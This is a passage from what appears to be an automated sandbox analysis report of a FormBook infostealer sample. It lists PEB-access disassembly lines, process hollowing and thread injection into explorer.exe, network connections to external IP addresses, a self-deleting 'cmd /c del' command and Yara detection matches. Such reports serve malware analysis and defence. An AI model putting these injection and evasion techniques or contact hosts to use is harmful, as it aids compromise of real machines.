            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04E24015 mov eax, dword ptr fs:[00000030h]4_2_04E24015
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D6B02A mov eax, dword ptr fs:[00000030h]4_2_04D6B02A
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D6B02A mov eax, dword ptr fs:[00000030h]4_2_04D6B02A
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D6B02A mov eax, dword ptr fs:[00000030h]4_2_04D6B02A
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D6B02A mov eax, dword ptr fs:[00000030h]4_2_04D6B02A
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04E1FDE2 mov eax, dword ptr fs:[00000030h]4_2_04E1FDE2
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04E1FDE2 mov eax, dword ptr fs:[00000030h]4_2_04E1FDE2
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04E1FDE2 mov eax, dword ptr fs:[00000030h]4_2_04E1FDE2
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04E1FDE2 mov eax, dword ptr fs:[00000030h]4_2_04E1FDE2
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04E08DF1 mov eax, dword ptr fs:[00000030h]4_2_04E08DF1
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04DD6DC9 mov eax, dword ptr fs:[00000030h]4_2_04DD6DC9
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04DD6DC9 mov eax, dword ptr fs:[00000030h]4_2_04DD6DC9
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04DD6DC9 mov eax, dword ptr fs:[00000030h]4_2_04DD6DC9
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04DD6DC9 mov ecx, dword ptr fs:[00000030h]4_2_04DD6DC9
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04DD6DC9 mov eax, dword ptr fs:[00000030h]4_2_04DD6DC9
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04DD6DC9 mov eax, dword ptr fs:[00000030h]4_2_04DD6DC9
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D5B1E1 mov eax, dword ptr fs:[00000030h]4_2_04D5B1E1
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D5B1E1 mov eax, dword ptr fs:[00000030h]4_2_04D5B1E1
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D5B1E1 mov eax, dword ptr fs:[00000030h]4_2_04D5B1E1
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04DE41E8 mov eax, dword ptr fs:[00000030h]4_2_04DE41E8
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D6D5E0 mov eax, dword ptr fs:[00000030h]4_2_04D6D5E0
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D6D5E0 mov eax, dword ptr fs:[00000030h]4_2_04D6D5E0
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D8FD9B mov eax, dword ptr fs:[00000030h]4_2_04D8FD9B
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D8FD9B mov eax, dword ptr fs:[00000030h]4_2_04D8FD9B
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D82990 mov eax, dword ptr fs:[00000030h]4_2_04D82990
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04E205AC mov eax, dword ptr fs:[00000030h]4_2_04E205AC
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04E205AC mov eax, dword ptr fs:[00000030h]4_2_04E205AC
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D7C182 mov eax, dword ptr fs:[00000030h]4_2_04D7C182
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D82581 mov eax, dword ptr fs:[00000030h]4_2_04D82581
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D82581 mov eax, dword ptr fs:[00000030h]4_2_04D82581
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D82581 mov eax, dword ptr fs:[00000030h]4_2_04D82581
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D82581 mov eax, dword ptr fs:[00000030h]4_2_04D82581
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D8A185 mov eax, dword ptr fs:[00000030h]4_2_04D8A185
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D52D8A mov eax, dword ptr fs:[00000030h]4_2_04D52D8A
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D52D8A mov eax, dword ptr fs:[00000030h]4_2_04D52D8A
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D52D8A mov eax, dword ptr fs:[00000030h]4_2_04D52D8A
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D52D8A mov eax, dword ptr fs:[00000030h]4_2_04D52D8A
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D52D8A mov eax, dword ptr fs:[00000030h]4_2_04D52D8A
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04DD51BE mov eax, dword ptr fs:[00000030h]4_2_04DD51BE
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04DD51BE mov eax, dword ptr fs:[00000030h]4_2_04DD51BE
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04DD51BE mov eax, dword ptr fs:[00000030h]4_2_04DD51BE
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04DD51BE mov eax, dword ptr fs:[00000030h]4_2_04DD51BE
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D81DB5 mov eax, dword ptr fs:[00000030h]4_2_04D81DB5
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D81DB5 mov eax, dword ptr fs:[00000030h]4_2_04D81DB5
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D81DB5 mov eax, dword ptr fs:[00000030h]4_2_04D81DB5
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D861A0 mov eax, dword ptr fs:[00000030h]4_2_04D861A0
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D861A0 mov eax, dword ptr fs:[00000030h]4_2_04D861A0
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D835A1 mov eax, dword ptr fs:[00000030h]4_2_04D835A1
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04DD69A6 mov eax, dword ptr fs:[00000030h]4_2_04DD69A6
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D77D50 mov eax, dword ptr fs:[00000030h]4_2_04D77D50
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D7B944 mov eax, dword ptr fs:[00000030h]4_2_04D7B944
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D7B944 mov eax, dword ptr fs:[00000030h]4_2_04D7B944
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D93D43 mov eax, dword ptr fs:[00000030h]4_2_04D93D43
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04DD3540 mov eax, dword ptr fs:[00000030h]4_2_04DD3540
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D7C577 mov eax, dword ptr fs:[00000030h]4_2_04D7C577
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D7C577 mov eax, dword ptr fs:[00000030h]4_2_04D7C577
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D5B171 mov eax, dword ptr fs:[00000030h]4_2_04D5B171
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D5B171 mov eax, dword ptr fs:[00000030h]4_2_04D5B171
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D5C962 mov eax, dword ptr fs:[00000030h]4_2_04D5C962
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D59100 mov eax, dword ptr fs:[00000030h]4_2_04D59100
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D59100 mov eax, dword ptr fs:[00000030h]4_2_04D59100
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D59100 mov eax, dword ptr fs:[00000030h]4_2_04D59100
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04E28D34 mov eax, dword ptr fs:[00000030h]4_2_04E28D34
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04E1E539 mov eax, dword ptr fs:[00000030h]4_2_04E1E539
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D8513A mov eax, dword ptr fs:[00000030h]4_2_04D8513A
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D8513A mov eax, dword ptr fs:[00000030h]4_2_04D8513A
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D63D34 mov eax, dword ptr fs:[00000030h]4_2_04D63D34
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D63D34 mov eax, dword ptr fs:[00000030h]4_2_04D63D34
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D63D34 mov eax, dword ptr fs:[00000030h]4_2_04D63D34
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D63D34 mov eax, dword ptr fs:[00000030h]4_2_04D63D34
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D63D34 mov eax, dword ptr fs:[00000030h]4_2_04D63D34
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D63D34 mov eax, dword ptr fs:[00000030h]4_2_04D63D34
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D63D34 mov eax, dword ptr fs:[00000030h]4_2_04D63D34
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D63D34 mov eax, dword ptr fs:[00000030h]4_2_04D63D34
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D63D34 mov eax, dword ptr fs:[00000030h]4_2_04D63D34
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D63D34 mov eax, dword ptr fs:[00000030h]4_2_04D63D34
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D63D34 mov eax, dword ptr fs:[00000030h]4_2_04D63D34
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D63D34 mov eax, dword ptr fs:[00000030h]4_2_04D63D34
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D63D34 mov eax, dword ptr fs:[00000030h]4_2_04D63D34
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D84D3B mov eax, dword ptr fs:[00000030h]4_2_04D84D3B
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D84D3B mov eax, dword ptr fs:[00000030h]4_2_04D84D3B
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D84D3B mov eax, dword ptr fs:[00000030h]4_2_04D84D3B
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D5AD30 mov eax, dword ptr fs:[00000030h]4_2_04D5AD30
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04DDA537 mov eax, dword ptr fs:[00000030h]4_2_04DDA537
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D74120 mov eax, dword ptr fs:[00000030h]4_2_04D74120
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D74120 mov eax, dword ptr fs:[00000030h]4_2_04D74120
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D74120 mov eax, dword ptr fs:[00000030h]4_2_04D74120
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D74120 mov eax, dword ptr fs:[00000030h]4_2_04D74120
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D74120 mov ecx, dword ptr fs:[00000030h]4_2_04D74120
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D82ACB mov eax, dword ptr fs:[00000030h]4_2_04D82ACB
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D836CC mov eax, dword ptr fs:[00000030h]4_2_04D836CC
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D98EC7 mov eax, dword ptr fs:[00000030h]4_2_04D98EC7
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04E0FEC0 mov eax, dword ptr fs:[00000030h]4_2_04E0FEC0
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04E28ED6 mov eax, dword ptr fs:[00000030h]4_2_04E28ED6
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D676E2 mov eax, dword ptr fs:[00000030h]4_2_04D676E2
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D816E0 mov ecx, dword ptr fs:[00000030h]4_2_04D816E0
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D82AE4 mov eax, dword ptr fs:[00000030h]4_2_04D82AE4
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04E20EA5 mov eax, dword ptr fs:[00000030h]4_2_04E20EA5
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04E20EA5 mov eax, dword ptr fs:[00000030h]4_2_04E20EA5
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04E20EA5 mov eax, dword ptr fs:[00000030h]4_2_04E20EA5
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D8D294 mov eax, dword ptr fs:[00000030h]4_2_04D8D294
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D8D294 mov eax, dword ptr fs:[00000030h]4_2_04D8D294
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04DEFE87 mov eax, dword ptr fs:[00000030h]4_2_04DEFE87
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D6AAB0 mov eax, dword ptr fs:[00000030h]4_2_04D6AAB0
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D6AAB0 mov eax, dword ptr fs:[00000030h]4_2_04D6AAB0
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D8FAB0 mov eax, dword ptr fs:[00000030h]4_2_04D8FAB0
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D552A5 mov eax, dword ptr fs:[00000030h]4_2_04D552A5
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D552A5 mov eax, dword ptr fs:[00000030h]4_2_04D552A5
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D552A5 mov eax, dword ptr fs:[00000030h]4_2_04D552A5
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D552A5 mov eax, dword ptr fs:[00000030h]4_2_04D552A5
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D552A5 mov eax, dword ptr fs:[00000030h]4_2_04D552A5
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04DD46A7 mov eax, dword ptr fs:[00000030h]4_2_04DD46A7
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04E0B260 mov eax, dword ptr fs:[00000030h]4_2_04E0B260
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04E0B260 mov eax, dword ptr fs:[00000030h]4_2_04E0B260
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04E28A62 mov eax, dword ptr fs:[00000030h]4_2_04E28A62
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04DE4257 mov eax, dword ptr fs:[00000030h]4_2_04DE4257
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D59240 mov eax, dword ptr fs:[00000030h]4_2_04D59240
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D59240 mov eax, dword ptr fs:[00000030h]4_2_04D59240
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D59240 mov eax, dword ptr fs:[00000030h]4_2_04D59240
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D59240 mov eax, dword ptr fs:[00000030h]4_2_04D59240
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D67E41 mov eax, dword ptr fs:[00000030h]4_2_04D67E41
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D67E41 mov eax, dword ptr fs:[00000030h]4_2_04D67E41
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D67E41 mov eax, dword ptr fs:[00000030h]4_2_04D67E41
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D67E41 mov eax, dword ptr fs:[00000030h]4_2_04D67E41
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D67E41 mov eax, dword ptr fs:[00000030h]4_2_04D67E41
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D67E41 mov eax, dword ptr fs:[00000030h]4_2_04D67E41
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D9927A mov eax, dword ptr fs:[00000030h]4_2_04D9927A
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D7AE73 mov eax, dword ptr fs:[00000030h]4_2_04D7AE73
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D7AE73 mov eax, dword ptr fs:[00000030h]4_2_04D7AE73
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D7AE73 mov eax, dword ptr fs:[00000030h]4_2_04D7AE73
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D7AE73 mov eax, dword ptr fs:[00000030h]4_2_04D7AE73
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D7AE73 mov eax, dword ptr fs:[00000030h]4_2_04D7AE73
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04E1AE44 mov eax, dword ptr fs:[00000030h]4_2_04E1AE44
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04E1AE44 mov eax, dword ptr fs:[00000030h]4_2_04E1AE44
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04E1EA55 mov eax, dword ptr fs:[00000030h]4_2_04E1EA55
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D6766D mov eax, dword ptr fs:[00000030h]4_2_04D6766D
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D5AA16 mov eax, dword ptr fs:[00000030h]4_2_04D5AA16
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D5AA16 mov eax, dword ptr fs:[00000030h]4_2_04D5AA16
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D8A61C mov eax, dword ptr fs:[00000030h]4_2_04D8A61C
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D8A61C mov eax, dword ptr fs:[00000030h]4_2_04D8A61C
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D55210 mov eax, dword ptr fs:[00000030h]4_2_04D55210
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D55210 mov ecx, dword ptr fs:[00000030h]4_2_04D55210
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D55210 mov eax, dword ptr fs:[00000030h]4_2_04D55210
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D55210 mov eax, dword ptr fs:[00000030h]4_2_04D55210
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D73A1C mov eax, dword ptr fs:[00000030h]4_2_04D73A1C
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D5C600 mov eax, dword ptr fs:[00000030h]4_2_04D5C600
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D5C600 mov eax, dword ptr fs:[00000030h]4_2_04D5C600
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D5C600 mov eax, dword ptr fs:[00000030h]4_2_04D5C600
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D88E00 mov eax, dword ptr fs:[00000030h]4_2_04D88E00
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D68A0A mov eax, dword ptr fs:[00000030h]4_2_04D68A0A
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04E0FE3F mov eax, dword ptr fs:[00000030h]4_2_04E0FE3F
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04E11608 mov eax, dword ptr fs:[00000030h]4_2_04E11608
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D5E620 mov eax, dword ptr fs:[00000030h]4_2_04D5E620
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D94A2C mov eax, dword ptr fs:[00000030h]4_2_04D94A2C
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D94A2C mov eax, dword ptr fs:[00000030h]4_2_04D94A2C
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04DD53CA mov eax, dword ptr fs:[00000030h]4_2_04DD53CA
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04DD53CA mov eax, dword ptr fs:[00000030h]4_2_04DD53CA
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D937F5 mov eax, dword ptr fs:[00000030h]4_2_04D937F5
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D803E2 mov eax, dword ptr fs:[00000030h]4_2_04D803E2
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D803E2 mov eax, dword ptr fs:[00000030h]4_2_04D803E2
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D803E2 mov eax, dword ptr fs:[00000030h]4_2_04D803E2
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D803E2 mov eax, dword ptr fs:[00000030h]4_2_04D803E2
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D803E2 mov eax, dword ptr fs:[00000030h]4_2_04D803E2
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D803E2 mov eax, dword ptr fs:[00000030h]4_2_04D803E2
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D7DBE9 mov eax, dword ptr fs:[00000030h]4_2_04D7DBE9
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D68794 mov eax, dword ptr fs:[00000030h]4_2_04D68794
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04E25BA5 mov eax, dword ptr fs:[00000030h]4_2_04E25BA5
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D8B390 mov eax, dword ptr fs:[00000030h]4_2_04D8B390
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04DD7794 mov eax, dword ptr fs:[00000030h]4_2_04DD7794
            Source: C:\Users\user\Desktop\vOKMFxiCYt.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\SysWOW64\raserver.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\vOKMFxiCYt.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion:

            barindex
            System process connects to network (likely due to code injection or exploit)Show sources
            Source: C:\Windows\explorer.exeNetwork Connect: 3.138.72.189 80Jump to behavior
            Source: C:\Windows\explorer.exeNetwork Connect: 198.49.23.141 80Jump to behavior
            Source: C:\Windows\explorer.exeNetwork Connect: 162.0.232.118 80Jump to behavior
            Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80Jump to behavior
            Allocates memory in foreign processesShow sources
            Source: C:\Users\user\Desktop\vOKMFxiCYt.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and writeJump to behavior
            Injects a PE file into a foreign processesShow sources
            Source: C:\Users\user\Desktop\vOKMFxiCYt.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5AJump to behavior
            Maps a DLL or memory area into another processShow sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection loaded: unknown target: C:\Windows\SysWOW64\raserver.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection loaded: unknown target: C:\Windows\SysWOW64\raserver.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\raserver.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\raserver.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
            Modifies the context of a thread in another process (thread injection)Show sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread register set: target process: 3388Jump to behavior
            Source: C:\Windows\SysWOW64\raserver.exeThread register set: target process: 3388Jump to behavior
            Queues an APC in another process (thread injection)Show sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
            Sample uses process hollowing techniqueShow sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection unmapped: C:\Windows\SysWOW64\raserver.exe base address: 1170000Jump to behavior
            Writes to foreign memory regionsShow sources
            Source: C:\Users\user\Desktop\vOKMFxiCYt.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000Jump to behavior
            Source: C:\Users\user\Desktop\vOKMFxiCYt.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000Jump to behavior
            Source: C:\Users\user\Desktop\vOKMFxiCYt.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: E6C008Jump to behavior
            Source: C:\Users\user\Desktop\vOKMFxiCYt.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeJump to behavior
            Source: C:\Windows\SysWOW64\raserver.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe'Jump to behavior
            Source: explorer.exe, 00000002.00000000.245822763.0000000001398000.00000004.00000020.sdmpBinary or memory string: ProgmanamF
            Source: explorer.exe, 00000002.00000002.505091353.0000000001980000.00000002.00000001.sdmp, raserver.exe, 00000004.00000002.504863704.00000000035E0000.00000002.00000001.sdmpBinary or memory string: Program Manager
            Source: explorer.exe, 00000002.00000000.253425578.0000000006860000.00000004.00000001.sdmp, raserver.exe, 00000004.00000002.504863704.00000000035E0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
            Source: explorer.exe, 00000002.00000002.505091353.0000000001980000.00000002.00000001.sdmp, raserver.exe, 00000004.00000002.504863704.00000000035E0000.00000002.00000001.sdmpBinary or memory string: Progman
            Source: explorer.exe, 00000002.00000002.505091353.0000000001980000.00000002.00000001.sdmp, raserver.exe, 00000004.00000002.504863704.00000000035E0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
            Source: C:\Users\user\Desktop\vOKMFxiCYt.exeQueries volume information: C:\Users\user\Desktop\vOKMFxiCYt.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\vOKMFxiCYt.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\vOKMFxiCYt.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\vOKMFxiCYt.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\vOKMFxiCYt.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\vOKMFxiCYt.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\vOKMFxiCYt.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information:

            barindex
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 00000001.00000002.272036979.00000000015B0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.271729564.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.242174585.0000000003AC9000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.504019492.0000000001140000.00000040.00000001.sdmp, type: MEMORY
